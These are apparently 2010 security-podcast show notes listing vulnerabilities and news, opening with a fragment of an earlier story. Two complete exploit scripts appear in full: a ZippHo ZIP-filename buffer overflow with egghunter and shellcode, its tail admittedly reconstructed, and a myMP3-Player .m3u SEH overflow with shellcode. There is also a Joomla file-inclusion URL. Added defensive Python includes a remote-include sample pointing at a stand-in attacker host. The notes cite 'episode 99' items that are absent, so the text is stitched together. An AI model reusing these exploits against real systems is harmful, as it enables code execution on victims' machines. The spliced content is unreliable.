Texas Auto Center began receiving complaints in the last week of February. Five days later, after Texas Auto Center reset the Webtech Plus passwords for all its employee accounts, the problems stopped. It turns out that Ramos-Lopez had (somehow) acquired another employee’s password to the system; his own account had been deactivated when he was terminated. Deactivating the departing user’s account was the right step, but it did not cover the shared or borrowed credential he still held, which is why a termination should also trigger a reset of every account he could have known.

Texas Auto Center manager Martin Garcia said that Ramos-Lopez was good with computers. Apparently, he wasn’t all that knowledgeable, however, as it was easy, once police obtained access logs from Pay Technologies, to trace his IP address down.

According to Jim Krueger, co-owner of Pay Technologies, this is the first such incident the company is aware of. “It was a fairly straightforward situation,” says Krueger. “He had retained a password, and what happened was he went in and created a little bit of havoc.”

News item 5:  http://www.securityfocus.com/news/11582
SecurityFocus has begun a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists, including Bugtraq, and its Vulnerability Database will remain online at www.securityfocus.com. There will not be any changes to any of the list charters or policies, and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence offerings will remain unchanged, while Infocus articles, whitepapers, and other SecurityFocus content will be available from the main Symantec website in the coming months.

2010
03.18

InfoSec Daily Podcast

 
ISD Podcast Episode 90 for March 18, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

  • Data Recovery Class is $3500 for all classes; go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.  Here are the current dates and locations for the classes:
    • Washington DC – April 12th to 16th
    • San Diego, CA – May 10th-14th
    • San Francisco, CA – June 14th -18th
    • Atlanta, GA – July – 12th-16th
    • Chicago, IL – September – 13th – 17th
    • Dallas, Tx – October – 11th – 15th
    • Washington DC – December 6th – 10th

OuterZ0ne:

  • Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning at the Wellesley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
  • The next DC404 meeting will be at Outerz0ne

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway


Vulnerabilities of Interest:

    1. The Bible Study component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input in the controller parameter. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Bible Study 6.1 is affected; other versions may be vulnerable as well. The following example URL is available: http://www.sample.com/index.php?option=com_biblestudy&id=1&view=studieslist&controller=[-LFI-]
    2. ZippHo is subject to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. ZippHo 3.0.6 is vulnerable; other versions may also be affected.  Proof of concept is available:
      #!/usr/bin/env python3
      # #######################################################################
      # ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit
      # Author: mr_me - http://net-ninja.net/ & http://twitter.com/StevenSeeley
      # Download: http://www.brothersoft.com/zippho-71295.html
      # Platform: Windows XP sp3 En
      # Greetz to: Corelan Security Team & fl0 fl0w
      # http://www.corelan.be:8800/index.php/security/corelan-team-members/
      # #######################################################################
      # Script provided 'as is', without any warranty.
      # Use for educational purposes only.
      # Do not use this code to do anything illegal !
      #
      # Note : you are not allowed to edit/modify this code.
      # If you do, Corelan cannot be held responsible for any damages this may cause.
      #
      # Reproduced here with the smart quotes un-mangled, the whitespace-collapsed
      # ASCII-art banner dropped, the strings marked as bytes for Python 3, and the
      # file-writing tail, which is cut off after "mefile =" in the show notes,
      # reconstructed from the length fields in the ZIP headers below.
      print("|-------------------------------------------[ EIP Hunters ]--|")
      print("| http://www.corelan.be:8800          security@corelan.be    |")
      print("[+] ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit")

      # local file header (30 bytes; filename length field = 0x0fe4 = 4068)
      lf_header = (b"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
                   b"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")

      # central directory file header (46 bytes; same 0x0fe4 filename length)
      cdf_header = (b"\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
                    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
                    b"\x24\x00\x00\x00\x00\x00\x00\x00")

      # end of central directory record (cd size 0x1012 = 46 + 4068, cd offset 0x1002 = 30 + 4068)
      efcdr_record = (b"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
                      b"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

      # ascii egghunter
      egghunter = (b"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
                   b"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA")

      # encoded calc
      calc = (b"\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
              b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
              b"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
              b"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
              b"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
              b"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
              b"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
              b"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
              b"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
              b"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
              b"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
              b"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
              b"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
              b"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
              b"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
              b"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
              b"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
              b"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
              b"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
              b"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
              b"\x50\x41\x41")

      # custom decoder
      decoder = (b"\x25\x4A\x4D\x4E\x55"
                 b"\x25\x35\x32\x31\x2A\x2d\x55\x55"
                 b"\x55\x5f\x2d\x56\x55\x56\x5f\x2d"
                 b"\x55\x55\x55\x5e\x50\x25\x4A\x4D"
                 b"\x4E\x55\x25\x35\x32\x31\x2A\x2d"
                 b"\x2b\x6a\x32\x53\x2d\x2a\x6a\x31"
                 b"\x54\x2d\x2a\x69\x31\x54\x50")

      # attack string (becomes the archive member's filename)
      exploit = b"\x43" * 10
      exploit += egghunter
      exploit += b"\x41" * (221 - len(exploit))
      exploit += b"\x61"
      exploit += b"\x53"
      exploit += b"\x5c"
      exploit += decoder
      exploit += b"\x41" * (292 - len(exploit))
      exploit += b"\x73\xf9\x41\x41"
      exploit += b"\x70\x54\x54\x00"
      exploit += b"\x57\x30\x30\x54"
      exploit += b"\x57\x30\x30\x54"
      # I have no eyes, I make the flash of lightning my eyes ~ samurai creed.
      exploit += calc
      exploit += b"\x41" * (4064 - len(exploit))
      exploit += b"\x2e\x74\x78\x74"          # ".txt": 4064 + 4 = 4068 = 0x0fe4
      print("[+] Writing attack string to file..")
      # Reconstructed tail: the filename follows the local file header and is
      # repeated after the central directory header, as the length fields above
      # require. The output filename is an assumption.
      with open("zippho-poc.zip", "wb") as mefile:
          mefile.write(lf_header + exploit + cdf_header + exploit + efcdr_record)
      print("[+] Done, open zippho-poc.zip in ZippHo 3.0.6")

    3. myMP3-Player is subject to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. myMP3-Player 3.0 is vulnerable; other versions may also be affected.  Exploit code is available:
      #!/usr/bin/perl
      use strict;
      use warnings;

      # Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
      # Date: 18.03.2010
      # Author: n3w7u
      # Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
      # Version: 3.0 (the other versions cannot be downloaded from a reputable page and are not free)
      # Tested on: Windows XP SP3 (ger)

      #[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]

      my $file = "evil.m3u";
      my $junk = "\x41" x 1040;       # for myMp3 Player 5/cracked junk = 1056
      my $jmp  = "\xEB\x08\x90\x90";  # nSEH: jmp short +8, over the SEH record into the NOPs
      my $seh  = "\x25\x12\xC8\x72";  # SEH: 0x72C81225, pop/pop/ret in msacm32.drv
      my $nop  = "\x90" x 20;
      my $nops = "\x90" x 10;

      # windows/exec - 224 bytes
      # http://www.metasploit.com
      # Encoder: x86/call4_dword_xor
      # EXITFUNC=process, CMD=calc.exe
      my $buf =
      "\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
      "\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" .
      "\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" .
      "\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" .
      "\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" .
      "\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" .
      "\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" .
      "\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" .
      "\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" .
      "\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" .
      "\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" .
      "\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" .
      "\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" .
      "\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" .
      "\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" .
      "\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce";

      open(my $fh, '>', $file) or die "Cannot open $file: $!";
      binmode($fh);                   # keep the shellcode bytes intact on Windows
      print $fh $junk . $jmp . $seh . $nop . $buf . $nops;
      close($fh);

    4. ManageEngine ServiceDesk Plus is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The issue affects ManageEngine ServiceDesk Plus 7.6.0; other versions may also be affected. All it takes is a browser to exploit this issue.
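
Item 6 of episode 99 (philboard, forumid=Sql) and item 4 above (ServiceDesk Plus) are the same defect: a request parameter is pasted into the SQL text. The following Python is added here as an example, not code from either product; it reproduces that pattern against an in-memory SQLite table, shows what the `Sql` probe and a boolean bypass do to it, and puts the parameterized form beside it. The table, its rows and the function names are constructed for the demonstration:

```python
import sqlite3


def make_db():
    """In-memory stand-in for the forum table; rows are constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE forum (forumid INTEGER, name TEXT, private INTEGER)")
    con.executemany("INSERT INTO forum VALUES (?, ?, ?)",
                    [(1, "general", 0), (2, "announcements", 0), (3, "staff-only", 1)])
    con.commit()
    return con


def forums_vulnerable(con, forumid):
    """The defect in both advisories: the request parameter becomes SQL text."""
    sql = ("SELECT name FROM forum WHERE private = 0 AND forumid = "
           + forumid + " ORDER BY forumid")
    return [row[0] for row in con.execute(sql)]


def forums_fixed(con, forumid):
    """Hardened form: enforce the expected type, then bind the value."""
    try:
        fid = int(forumid)
    except ValueError:
        raise ValueError("forumid must be an integer, got %r" % forumid)
    sql = "SELECT name FROM forum WHERE private = 0 AND forumid = ? ORDER BY forumid"
    return [row[0] for row in con.execute(sql, (fid,))]


def demo():
    """Run the same inputs through both versions and collect what happens."""
    con = make_db()
    out = {}
    out["normal"] = forums_vulnerable(con, "1")
    # 'Sql' as in the philboard URL: a bare word becomes an identifier lookup and
    # the database's error text goes straight back to the probing client.
    try:
        forums_vulnerable(con, "Sql")
        out["probe"] = "no error"
    except sqlite3.OperationalError as exc:
        out["probe"] = "db error leaked: %s" % exc
    # Boolean injection: AND binds tighter than OR, so the private = 0 filter is
    # bypassed and every row, including the private forum, comes back.
    out["bypass"] = forums_vulnerable(con, "1 OR 1=1")
    out["fixed_normal"] = forums_fixed(con, "1")
    for bad in ("Sql", "1 OR 1=1"):
        try:
            forums_fixed(con, bad)
            out["fixed_" + bad] = "accepted"
        except ValueError:
            out["fixed_" + bad] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-16s %s" % (key, value))
```

The leaked error in the `probe` case is exactly why a scanner sends a non-numeric token first: the response tells it whether the parameter reaches the database unquoted before it spends any effort on a real payload. The fixed version never lets the value into the SQL text at all, and the type check in front of the bind call turns the probe into a 400 rather than a database round trip.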
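
Item 7 of episode 99 (Softsaurus, includes_path and objects_path) and item 1 above (Joomla! Bible Study, controller=) both take an include path from the query string; the first lets it point at a remote host, the second at a local file outside the component. This Python is added as an example and is neither project's code. It shows the checks that close both holes: refuse anything with a URL scheme or stream wrapper (remote inclusion), normalise the path and refuse traversal (local inclusion), and finally require the result to be one of the files the application actually ships. The base directory, the allowlist and the sample values (with the advisories' [Shell] and [-LFI-] placeholders replaced by a hypothetical host and a traversal string) are assumptions:

```python
import posixpath
from urllib.parse import urlsplit

# Assumed deployment (not Softsaurus' or Joomla!'s real layout): everything
# includable lives under BASE, and only these relative paths are ever included.
BASE = "/srv/app/content"
ALLOWED = {
    "plugins/wallpapers/includes.php",
    "themes/softsaurus_default/pages/subHeader.php",
    "components/com_biblestudy/controllers/studieslist.php",
}


class IncludeRejected(ValueError):
    """The parameter cannot be mapped to a shipped file; log it and answer 400."""


def is_remote_or_wrapper(value):
    """RFI guard: a scheme (http:, ftp:, php:, data:, expect:) or a
    protocol-relative // or \\\\ prefix is never a local file."""
    if value.startswith("//") or value.startswith("\\\\"):
        return True
    return bool(urlsplit(value).scheme)


def safe_include(value, base=BASE, allowed=ALLOWED):
    """Map an untrusted include parameter to a path under base, or refuse."""
    if "\x00" in value:
        raise IncludeRejected("NUL byte in %r" % value)
    if is_remote_or_wrapper(value):
        raise IncludeRejected("remote URL or stream wrapper: %r" % value)
    # LFI guard: collapse ./ and ../ first, then refuse anything that still
    # climbs out of base. lstrip('/') also neutralises absolute paths.
    rel = posixpath.normpath(value.lstrip("/"))
    if rel in (".", "..") or rel.startswith("../"):
        raise IncludeRejected("path escapes base: %r" % value)
    # Strongest check: the result must be a file the application ships.
    if rel not in allowed:
        raise IncludeRejected("not an installed module: %r" % value)
    full = posixpath.join(base, rel)
    if posixpath.commonpath([base, full]) != base:      # belt and braces
        raise IncludeRejected("resolved outside base: %r" % full)
    return full


def classify(values):
    """Return {input: resolved path or 'REJECTED: reason'} for the sample inputs."""
    result = {}
    for v in values:
        try:
            result[v] = safe_include(v)
        except IncludeRejected as exc:
            result[v] = "REJECTED: %s" % exc
    return result


# Constructed inputs shaped like the advisories' URLs.
SAMPLES = [
    "plugins/wallpapers/includes.php",
    "themes/../plugins/wallpapers/includes.php",
    "http://attacker.example/shell.txt?",
    "php://input",
    "../../../../etc/passwd",
    "plugins/wallpapers/includes.php\x00.jpg",
]

if __name__ == "__main__":
    for k, v in classify(SAMPLES).items():
        print("%-45r -> %s" % (k, v))
```

The allowlist is the check that matters; the scheme and traversal tests are there so the rejection reason in the log tells you what kind of probe you are looking at. In the real fix for either product the include path should not come from the request at all: the request names a module, and the application maps that name to a path it owns.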
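
The ZippHo PoC above (item 2) works by giving the single archive member a 4068-byte (0x0fe4) filename, which the player copies into a fixed-size stack buffer. The following Python is added as an example and is not part of the exploit: it walks the local file headers of a ZIP with struct, without trusting the central directory or the stdlib parser, and flags entries whose filename length exceeds a sane limit, which is the check a mail gateway or upload handler would apply before passing an archive to a third-party unpacker. The minimal archive builder used as input, the 260-byte limit and the sample names are constructed for the demonstration:

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"
LOCAL_FMT = "<4sHHHHHIIIHH"             # 30-byte local file header
LOCAL_LEN = struct.calcsize(LOCAL_FMT)
MAX_NAME_LEN = 260                       # assumed policy (Windows MAX_PATH)


def iter_local_headers(data):
    """Walk the local file headers in order. Stops at the first non-local
    signature (normally the central directory, PK\\x01\\x02). Simplified to
    entries whose sizes are in the header, i.e. no data descriptors."""
    off = 0
    while data.startswith(LOCAL_SIG, off):
        if off + LOCAL_LEN > len(data):
            raise ValueError("truncated local header at offset %d" % off)
        (_sig, _ver, _flags, method, _time, _date, _crc, csize, _usize,
         name_len, extra_len) = struct.unpack_from(LOCAL_FMT, data, off)
        name_start = off + LOCAL_LEN
        name = data[name_start:name_start + name_len]
        if len(name) != name_len:
            raise ValueError("filename length %d overruns the data at offset %d"
                             % (name_len, off))
        yield {"offset": off, "name_len": name_len, "name": name,
               "method": method, "csize": csize}
        off = name_start + name_len + extra_len + csize


def suspicious_entries(data, max_name_len=MAX_NAME_LEN):
    """Entries whose filename is longer than any legitimate path could be; the
    ZippHo input declares 0x0fe4 = 4068 bytes in both headers."""
    return [e for e in iter_local_headers(data) if e["name_len"] > max_name_len]


def build_zip(name, payload=b""):
    """Constructed sample input: a valid single-member stored archive with the
    same three structures the PoC hand-assembles (local header, central
    directory header, end-of-central-directory record)."""
    crc = zlib.crc32(payload) & 0xFFFFFFFF
    local = struct.pack(LOCAL_FMT, LOCAL_SIG, 20, 0, 0, 0, 0, crc,
                        len(payload), len(payload), len(name), 0) + name + payload
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, 0, 0, 0, 0,
                          crc, len(payload), len(payload), len(name),
                          0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(central), len(local), 0)
    return local + central + eocd


def stdlib_names(data):
    """What Python's own zipfile sees. It copes with the long name without
    complaint, which is the point: the archive is well-formed and the bug is
    in the victim's parser, so a scanner has to look at the length itself."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    benign = build_zip(b"notes.txt", b"hello")
    evil = build_zip(b"A" * 4064 + b".txt")
    print("benign:", suspicious_entries(benign), stdlib_names(benign))
    print("evil:", [(e["offset"], e["name_len"]) for e in suspicious_entries(evil)])
```

Because the walker reads the local headers rather than the central directory, it also catches the case where the two disagree, which is a second thing to treat as hostile: an unpacker that trusts one and copies from the other is the other common way these parsers fall over.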

Stories of Interest:
News item 1:  http://www.theregister.co.uk/2010/03/15/facebook_profile_stalk_scam/
A bogus application that lures Facebook users by falsely offering to show who has been viewing their profile has been exposed as a scam. A researcher warns he has already identified 25 different copies of the same rogue app but using different monikers such as peeppeep-pro, profile-check-online and stalk-my-profile.

All of the rogue apps are spread by updates seeking to lure the friends of previous victims to give the stalkerware a try. Some even offer a photo montage of a victim’s contacts in a bid to add more authenticity. However, none of the apps actually do anything except profit their creators via ad affiliate revenues and deceptive tactics.

“The app itself is designed to look convincing enough, but none of the many ‘Continue’ buttons it offers will activate some under-the-counter profile checking functionality – they will just push you into another Facebook app earning the scammer advertising revenue in the process,” Ferguson explains in a blog post containing screenshots illustrating the scam, which resurfaced over the weekend.

News item 2: http://go.microsoft.com/?linkid=9722922

Microsoft has released a workaround for a zero-day vulnerability in older versions of Internet Explorer. Microsoft’s senior security communications manager said that a workaround for the remote code execution vulnerability covered by Security Advisory 981374 has been released. Microsoft has confirmed that Internet Explorer 8, and Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4, are not affected, but that Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6 and Internet Explorer 7, are vulnerable. The manager also confirmed that exploit code has been made public for this issue.

To apply the “Disable peer factory in iepeers.dll” workaround automatically on supported versions of Windows XP and Windows Server 2003, click the Fix it button or link. Click Run in the File Download dialog box, and then follow the steps in the Fix it wizard.

To undo the fix and restore the original settings, click the Fix this problem link under the “Disable this fix” heading. Then, click Run in the File Download dialog box and follow the steps in the wizard.

News item 3: http://www.pcmag.com/article2/0,2817,2361525,00.asp

Hackers have flooded the Internet with virus-tainted spam that targets Facebook’s estimated 400 million users in an effort to steal banking passwords and gather other sensitive information.

The emails tell recipients that the passwords on their Facebook accounts have been reset, urging them to click on an attachment to obtain new login credentials, according to anti-virus software maker McAfee Inc.

If the attachment is opened, it downloads several types of malicious software, including a program that steals passwords, McAfee said on Wednesday.

Hackers have long targeted Facebook users, sending them tainted messages via the social networking company’s own internal email system. With this new attack, they are using regular Internet email to spread their malicious software.

News item 4: http://www.darkreading.com/security/management/showArticle.jhtml?articleID=223800256

Most security professionals who officially map out their career plans make higher salaries than those who don’t. Around 60 percent of those who have written career plans earn more than $100,000 a year, while about 45 percent of those without career plans land in that salary bracket, according to just-released data from a comprehensive voluntary survey taken of security pros from late 2008 through 2009.

The survey found that security pros with a career plan are 33 percent more likely to earn more than $100,000, and 46 percent more likely to earn more than $120,000.

The Information Security Career Survey, which was conducted by InfoSecLeaders.com to provide an inside look at what security professionals are doing and thinking about their careers, encompasses responses from around 940 IT security people, two-thirds of whom are engineers, team leaders, and security architects from all sizes of organizations.
Iron Geek Technical Segment:
http://www.irongeek.com/i.php?page=security/hacker-con-handout